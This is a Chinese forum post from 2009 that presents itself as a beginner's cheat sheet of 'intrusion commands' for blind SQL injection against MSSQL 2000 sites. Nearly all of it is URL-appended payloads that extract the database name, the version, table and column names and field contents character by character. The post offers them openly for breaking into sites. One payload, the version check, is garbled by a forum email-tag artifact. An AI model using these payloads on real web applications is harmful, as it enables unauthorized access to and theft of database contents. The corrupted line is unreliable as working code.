|
|
闲的没事干,将mssql2000(非显错模式)的入侵常用命令整理下~~。。其实非显错模式也可以用工具进行猜解,但是工具就是不准确喜欢误报。。掌握原理学会手工猜解才是王道~~ 当然以下都是一些基础内容,写给菜鸟朋友的,高手飘过
url and (select ascii(substring((select db_name()),1,1)))>0
/判断当前库名,通过改变1的值逐步猜解整个数据库名。
url and (select substring((select [email=0@@version),23,4))= 2000]0@@version),23,4))='2000'[/email]
/判断数据库版本
url and (select count(*) from sysobjects where name in (select top 1
name from sysobjects where xtype='u') and len(name)=9)=1
/猜解表名长度,改变len(name)的值来确定表名长度
url and (select count(*) from sysobjects where name in (select top 1
name from sysobjects where xtype='u') and ascii(substring(name,1,1))
>90)=1
/猜解表名
url and (select count(*) from syscolumns where name in (select top 1
name from syscolumns where id=object_id('表名')) and ascii(substring
(name,1,1))>90)=1
/猜字段
url and (select count(*) from 表名 where 字段名 in (select top 1 字段
名 from 表名) and ascii(substring(字段名,1,1))>90)=1
/猜解字段内容
常用的大致就这些!~· |
|
发表于 2009-5-16 22:09:18